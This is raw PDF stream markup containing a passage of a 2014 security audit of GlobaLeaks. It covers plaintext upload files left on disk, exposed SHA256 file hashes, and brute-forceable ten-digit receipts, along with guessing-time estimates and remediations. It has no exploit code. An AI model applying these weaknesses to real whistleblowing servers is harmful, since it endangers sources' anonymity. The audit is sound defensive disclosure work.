BT 1 0 0 1 0 26 Tm 1.221984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (To gain block-level access to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node's disk, they would have to either have) Tj T* 0 Tw .074987 Tw (root access to the server, or physical access to the hard drive. Once they have this access, recovering the) Tj T* 0 Tw (plaintext files is trivial.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 582.0236 cm
q
BT 1 0 0 1 0 26 Tm .778735 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection and by checking the contents of the files written to disk) Tj T* 0 Tw 1.584104 Tw (after submitting them to a receiver with a ) Tj /F4 10 Tf (PGP ) Tj /F1 10 Tf (key configured. The steps followed to verify this issue) Tj T* 0 Tw (were:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 576.0236 cm
Q
q
1 0 0 1 62.69291 576.0236 cm
Q
q
1 0 0 1 62.69291 564.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Submit a Tip with a file to a receiver with a PGP key configured.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 558.0236 cm
Q
q
1 0 0 1 62.69291 534.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .169213 Tw 12 TL /F1 10 Tf 0 0 0 rg (Look in ) Tj /F3 10 Tf (/var/globaleaks/files/submission/ ) Tj /F1 10 Tf (and see that the file has been written to disk in) Tj T* 0 Tw (plaintext.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 528.0236 cm
Q
q
1 0 0 1 62.69291 504.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .76561 Tw (Complete the Tip submission, and see that the plaintext file was removed and replaced with a new) Tj T* 0 Tw (ciphertext file.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 504.0236 cm
Q
q
1 0 0 1 62.69291 486.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (See the screenshot below:) Tj T* ET
Q
Q
q
1 0 0 1 96.9978 237.1436 cm
q
401.28 0 0 242.88 0 0 cm
/FormXob.3504796935e9b1b0d34a034172872e63 Do
Q
Q
q
1 0 0 1 62.69291 219.1436 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 177.1436 cm
q
BT 1 0 0 1 0 26 Tm .739984 Tw 12 TL /F1 10 Tf 0 0 0 rg (In the default ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (configuration, the whistleblower's files are written to disk, in plaintext, as soon) Tj T* 0 Tw .48881 Tw (as they are uploaded. Once the Tip has been submitted, the files are encrypted with the receiver's public) Tj T* 0 Tw (key, and the temporary plaintext files are unlinked from the filesystem.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 147.1436 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.12528 Tw (Unlinking the files from the filesystem does not destroy the data, it only removes the references to that) Tj T* 0 Tw (data. The content of the files will continue to exist on disk until it is overwritten by other files.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 105.1436 cm
q
BT 1 0 0 1 0 26 Tm 2.401976 Tw 12 TL /F1 10 Tf 0 0 0 rg (The code for encrypting files is in ) Tj /F3 10 Tf (globaleaks/jobs/delivery_sched.py) Tj /F1 10 Tf (. More specifically, the) Tj T* 0 Tw .32784 Tw /F3 10 Tf (fsops_gpg_encrypt\(\) ) Tj /F1 10 Tf (function. This function takes a ) Tj /F4 10 Tf (path ) Tj /F1 10 Tf (to the plaintext file, which has already been) Tj T* 0 Tw (written to disk.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 87.14362 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
 
endstream
endobj
% 'R352': class PDFStream 
352 0 obj
% page stream
<< /Length 2863 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 753.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The version of ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (we audited does not provide any settings to make mitigating this issue easy.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 711.0236 cm
q
BT 1 0 0 1 0 26 Tm .37686 Tw 12 TL /F1 10 Tf 0 0 0 rg (As a short-term mitigation, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should use a tool like ) Tj /F3 10 Tf (srm ) Tj /F1 10 Tf (to wipe the disk's) Tj T* 0 Tw .269988 Tw (free space. This is not a reliable mitigation, since ) Tj /F3 10 Tf (srm ) Tj /F1 10 Tf (is not guaranteed to erase ) Tj /F4 10 Tf (all ) Tj /F1 10 Tf (free space, and may) Tj T* 0 Tw (leave portions of the unlinked plaintext files intact.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 693.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 663.0236 cm
q
BT 1 0 0 1 0 14 Tm .962927 Tw 12 TL /F1 10 Tf 0 0 0 rg (Once something has been written to non-volatile storage like a hard disk, it is extremely difficult to later) Tj T* 0 Tw (guarantee that it is erased. ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (should never write a plaintext file to non-volatile storage.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 621.0236 cm
q
BT 1 0 0 1 0 26 Tm .812485 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (should encrypt files with an ephemeral key as they are uploaded, before they are written to) Tj T* 0 Tw 2.981318 Tw (disk. The ephemeral key should stay in non-volatile memory until the files are encrypted with the) Tj T* 0 Tw (receiver's ) Tj /F4 10 Tf (PGP ) Tj /F1 10 Tf (key. Then the ephemeral key can be securely erased from memory.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 567.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 2.608651 Tw (Another possible remediation is to encrypt files in JavaScript before they are uploaded \(i.e. do the) Tj T* 0 Tw .65284 Tw (ephemeral key encryption in JavaScript\). PGP encryption in JavaScript is not feasible because the client) Tj T* 0 Tw 1.573984 Tw (would have to re-encrypt and re-upload the file for each receiver \(otherwise receivers could tell which) Tj T* 0 Tw (other receivers got the file\).) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 537.0236 cm
q
BT 1 0 0 1 0 14 Tm .721984 Tw 12 TL /F1 10 Tf 0 0 0 rg (According to email from the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (developers, a similar remediation for this issue is already being) Tj T* 0 Tw (developed. We will work with the developers to ensure their solution is sound.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 519.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks ticket 672) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 519.0236 cm
Q
 
endstream
endobj
% 'R353': class PDFStream 
353 0 obj
% page stream
<< /Length 4624 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue B. SHA256 of Plaintext File is Saved when Encryption is Enabled) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.835697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The SHA256 hashes of the files whistleblowers submit are saved and displayed to the) Tj T* 0 Tw (whistleblower and receivers, even when the receiver has a public key configured.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 648.0236 cm
q
BT 1 0 0 1 0 38 Tm 1.249431 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An adversary who can log in as the whistleblower or the receiver, or who gains access to the) Tj T* 0 Tw .923984 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node's database, can check guesses about the file that was submitted. For example, if the) Tj T* 0 Tw 1.189986 Tw (adversary has a list of 1000 files they suspect were submitted, they can compare the SHA256 hash of) Tj T* 0 Tw (each to find which ones \(if any\) were submitted.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 606.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .553876 Tw (If the adversary knows only most of the file's contents, they can use the SHA256 hash to check guesses) Tj T* 0 Tw .165542 Tw (about the unknown part. For example, if they know the file contains a phone number, they can try hashing) Tj T* 0 Tw (variants of the file with every possible phone number.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 552.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL .975777 Tw (Even if the adversary cannot guess or brute-force the contents of the file, they can still use the hash to) Tj T* 0 Tw .224651 Tw (rule out certain possibilities. For example, if the file contains the whistleblower's credit card number, trying) Tj T* 0 Tw .472339 Tw (all possible credit card numbers would be infeasible, but many credit card numbers could be ruled out by) Tj T* 0 Tw (showing that the hash doesn't match, thus decreasing the real whistleblower's anonymity-set size.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 510.0236 cm
q
BT 1 0 0 1 0 26 Tm .261098 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs access to log in as the whistleblower or the receiver of the file, or) Tj T* 0 Tw 1.227045 Tw (access to the Node's database. The attacker may also be able to recover the hash from the receiver's) Tj T* 0 Tw (browser's ) Tj /F3 10 Tf (Etag ) Tj /F1 10 Tf (cache.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 444.0236 cm
q
BT 1 0 0 1 0 50 Tm .645318 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The feasibility of this attack depends on the specific scenario, and on how much information) Tj T* 0 Tw 2.166235 Tw (the attacker already has about the files that were uploaded. If the whistleblower submitted one of a) Tj T* 0 Tw 2.937126 Tw (company's official documents without modifying it at all, finding the document given access to the) Tj T* 0 Tw .153735 Tw (document set and the hash is trivial. If the whistleblower submitted files containing random strings that the) Tj T* 0 Tw (attacker cannot guess, then the adversary can only rule out guesses.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 414.0236 cm
q
BT 1 0 0 1 0 14 Tm 3.525366 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by using the software as the whistleblower and receiver. See the following) Tj T* 0 Tw (screenshot.) Tj T* ET
Q
Q
q
1 0 0 1 112.2378 163.9436 cm
q
370.8 0 0 244.08 0 0 cm
/FormXob.12d7112d5b2b1261984a9bb3e1aa38ff Do
Q
Q
q
1 0 0 1 62.69291 145.9436 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 115.9436 cm
q
BT 1 0 0 1 0 14 Tm 1.744692 Tw 12 TL /F1 10 Tf 0 0 0 rg (When a whistleblower uploads a file, it is hashed with SHA256 and the hash saved to the database,) Tj T* 0 Tw (before the file's encryption. This happens in ) Tj /F3 10 Tf (dump_file_fs\(\) ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 85.94362 cm
q
BT 1 0 0 1 0 14 Tm 2.276647 Tw 12 TL /F1 10 Tf 0 0 0 rg (Further, in ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (, the ) Tj /F3 10 Tf (Etag ) Tj /F1 10 Tf (header is set to the SHA256 hash. This ) Tj T* 0 Tw 1.112093 Tw (increases the risk of it being leaked, since the user's web browser may write this value to disk and not) Tj T* 0 Tw ET
Q
Q
 
endstream
endobj
% 'R354': class PDFStream 
354 0 obj
% page stream
<< /Length 4236 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 729.0236 cm
q
BT 1 0 0 1 0 26 Tm .592485 Tw 12 TL /F1 10 Tf 0 0 0 rg (delete it properly. This also makes it possible for forensic investigators to confirm that the user's browser) Tj T* 0 Tw .845542 Tw (downloaded the file. When testing with the ) Tj /F4 10 Tf (Tor Browser Bundle) Tj /F1 10 Tf (, the ) Tj /F4 10 Tf (Etag ) Tj /F1 10 Tf (is not sent back to the server,) Tj T* 0 Tw (and we are unsure if it is being stored in the browser's cache.) Tj T* ET
Q
Q
q
1 0 0 1 115.7178 471.0236 cm
q
363.84 0 0 252 0 0 cm
/FormXob.50a88798ae89ee7ab040ed56b8555632 Do
Q
Q
q
1 0 0 1 62.69291 453.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 423.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.044147 Tw (Whistleblowers can mitigate this issue by including cryptographically-secure random strings in their files) Tj T* 0 Tw (before uploading them, taking care that these strings and modified files not be saved or shared elsewhere.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 405.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 375.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .82881 Tw (To fix this issue, the SHA256 hash feature should be removed. The Etag header should take a different) Tj T* 0 Tw (value, perhaps the hash of the ciphertext after GPG-encryption.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 333.0236 cm
q
BT 1 0 0 1 0 26 Tm .53284 Tw 12 TL /F1 10 Tf 0 0 0 rg (According to the ) Tj 0 0 .501961 rg (GlobaLeaks Application Security Design and Details ) Tj 0 0 0 rg (document, this feature is meant for) Tj T* 0 Tw 2.258651 Tw (receivers to look the file up in virus databases. That's probably not useful, and actually encourages) Tj T* 0 Tw (receivers to leak info about the files, since they will probably use a third-party online service.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 303.0236 cm
q
BT 1 0 0 1 0 14 Tm 4.869984 Tw 12 TL /F1 10 Tf 0 0 0 rg (Another use case is for a whistleblower to verify that their file uploaded successfully; but a) Tj T* 0 Tw (man-in-the-middle that could modify the file could also modify the alleged hash.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 285.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 279.0236 cm
Q
q
1 0 0 1 62.69291 279.0236 cm
Q
q
1 0 0 1 62.69291 255.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .983828 Tw 12 TL /F4 10 Tf 0 0 0 rg (Update 2014-01-31 ) Tj /F1 10 Tf (- The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (team suggested this issue was related to ) Tj 0 0 .501961 rg (GlobaLeaks ticket) Tj T* 0 Tw (782) Tj 0 0 0 rg (, as well as the ) Tj 0 0 .501961 rg (GlobaLeaks Submission Flood Resiliency Project) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 249.0236 cm
Q
q
1 0 0 1 62.69291 213.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm .039983 Tw 12 TL /F4 10 Tf 0 0 0 rg (Update 2014-02-06 ) Tj /F1 10 Tf (- ) Tj /F4 10 Tf (Least Authority ) Tj /F1 10 Tf (determined this issue is unrelated to flooding attacks, so neither) Tj T* 0 Tw 1.570888 Tw 0 0 .501961 rg (GlobaLeaks ticket 782 ) Tj 0 0 0 rg (nor ) Tj 0 0 .501961 rg (GlobaLeaks Submission Flood Resiliency Project ) Tj 0 0 0 rg (are directly relevant.) Tj T* 0 Tw (This suggests this Issue description need improvement.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 207.0236 cm
Q
q
1 0 0 1 62.69291 195.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #822) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 195.0236 cm
Q
q
1 0 0 1 62.69291 195.0236 cm
Q
 
endstream
endobj
% 'R355': class PDFStream 
355 0 obj
% page stream
<< /Length 7445 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue C. Receipts are Vulnerable to Guessing) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 690.0236 cm
q
BT 1 0 0 1 0 26 Tm 1.643828 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The receipts generated by ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (to let whistleblowers view tips they have submitted) Tj T* 0 Tw 1.92311 Tw (consist of 10 random digits in the default configuration. This is not enough entropy to prevent offline) Tj T* 0 Tw (guessing, nor to prevent online guessing without contingent mitigations.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 660.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .25686 Tw (The default receipt size and format is an explicit design choice intended to balance usability and plausible) Tj T* 0 Tw (deniability against brute-force guessing resistance.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 642.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (By guessing a receipt, and attacker can authenticate as that tip's whistleblower to the Node.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 600.0236 cm
q
BT 1 0 0 1 0 26 Tm .497318 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (Given access to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (web site, an attacker can attempt to guess receipts) Tj T* 0 Tw .616098 Tw (by trying all 10^10 possibilities. To perform an online attack, the attacker needs to be able to send many) Tj T* 0 Tw (requests to the web server.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 558.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .422927 Tw (To perform an offline attack, the attacker needs access to the receipt hashes and the Node's receipt salt.) Tj T* 0 Tw 2.757485 Tw (Given a receipt hash from the GlobaLeaks Node, an attacker can find the associated receipt in a) Tj T* 0 Tw (reasonable amount of time, by trying all 10^10 possibilities.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 540.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Feasibility:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 522.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Assuming a rate of 1000 guesses per second, which is reasonable for an online attack:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 516.0236 cm
Q
q
1 0 0 1 62.69291 516.0236 cm
Q
q
1 0 0 1 62.69291 492.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.38528 Tw (If there are 1000 existing receipts, the attacker should find one of them in about 1.4 hours of) Tj T* 0 Tw (guessing on average.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 486.0236 cm
Q
q
1 0 0 1 62.69291 462.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .33832 Tw (If there are 100 existing receipts, the attacker should find one of them in about 19 hours of guessing) Tj T* 0 Tw (on average.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 456.0236 cm
Q
q
1 0 0 1 62.69291 432.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .525777 Tw (If there are 10 existing receipts, the attacker should find one of them in about 186 hours \(8 days\) of) Tj T* 0 Tw (guessing.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 426.0236 cm
Q
q
1 0 0 1 62.69291 414.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (If there is one existing receipt, the attacker should find it in about 58 days of guessing.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 414.0236 cm
Q
q
1 0 0 1 62.69291 384.0236 cm
q
BT 1 0 0 1 0 14 Tm .66998 Tw 12 TL /F1 10 Tf 0 0 .501961 rg (Appendix E. Computing Multiple Target Guessing Success Probabilities ) Tj 0 0 0 rg (explains how these figures were) Tj T* 0 Tw (computed.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 342.0236 cm
q
BT 1 0 0 1 0 26 Tm 1.752651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Even though ) Tj /F3 10 Tf (scrypt ) Tj /F1 10 Tf (with the parameters ) Tj /F3 10 Tf (N=2^14) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (r=8) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (p=1) Tj /F1 10 Tf (, and ) Tj /F3 10 Tf (buflen=64 ) Tj /F1 10 Tf (is used to hash the) Tj T* 0 Tw .537882 Tw (receipts, if an attacker learns one of the hashes, it should be trivial to run an offline brute-force search of) Tj T* 0 Tw (the entire keyspace.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 324.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by using the software and by source code inspection.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 306.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 288.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The default receipt-generation pattern is defined in ) Tj /F3 10 Tf (globaleaks/settings.py) Tj /F1 10 Tf (, line 170:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 254.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 24 re B*
Q
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F3 10 Tf 12 TL (self.defaults.receipt_regexp = u'[0-9]{10}') Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 234.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This default specifies a sequence of 10 digits, yielding ) Tj /F3 10 Tf (10^10 ) Tj /F1 10 Tf (possibilities, or about 34 bits of entropy.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 192.8236 cm
q
BT 1 0 0 1 0 26 Tm 2.202651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Even disregarding malicious actors, the chance that a Node will issue the same receipt for different) Tj T* 0 Tw 1.354104 Tw (submissions is notable. The chance of a collision is expected to reach 50% as the number of receipts) Tj T* 0 Tw (approaches ) Tj /F3 10 Tf (sqrt\(10^10\)) Tj ( ) Tj (=) Tj ( ) Tj (10^5 ) Tj /F1 10 Tf (or 10,000 receipts.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 162.8236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .042765 Tw (Receipts are also hashed with a fixed per-Node salt. If an attacker gains access to these hashes, they can) Tj T* 0 Tw (perform an offline attack.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 144.8236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 114.8236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .900814 Tw (There are several potentially competing goals which affect mitigation: usability, plausible deniability, and) Tj T* 0 Tw (brute force protection.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 84.82362 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .746136 Tw (We recommend notifying Node administrators presenting the findings of this issue, then instructing them) Tj T* 0 Tw (to make an informed tradeoff between these goals.) Tj T* ET
Q
Q
 
endstream
endobj
% 'R356': class PDFStream 
356 0 obj
% page stream
<< /Length 4651 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 753.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (If the Node administrator selects a policy which is:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 747.0236 cm
Q
q
1 0 0 1 62.69291 747.0236 cm
Q
q
1 0 0 1 62.69291 735.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (stronger protection ) Tj /F1 10 Tf (against guessing attacks,) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 729.0236 cm
Q
q
1 0 0 1 62.69291 705.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
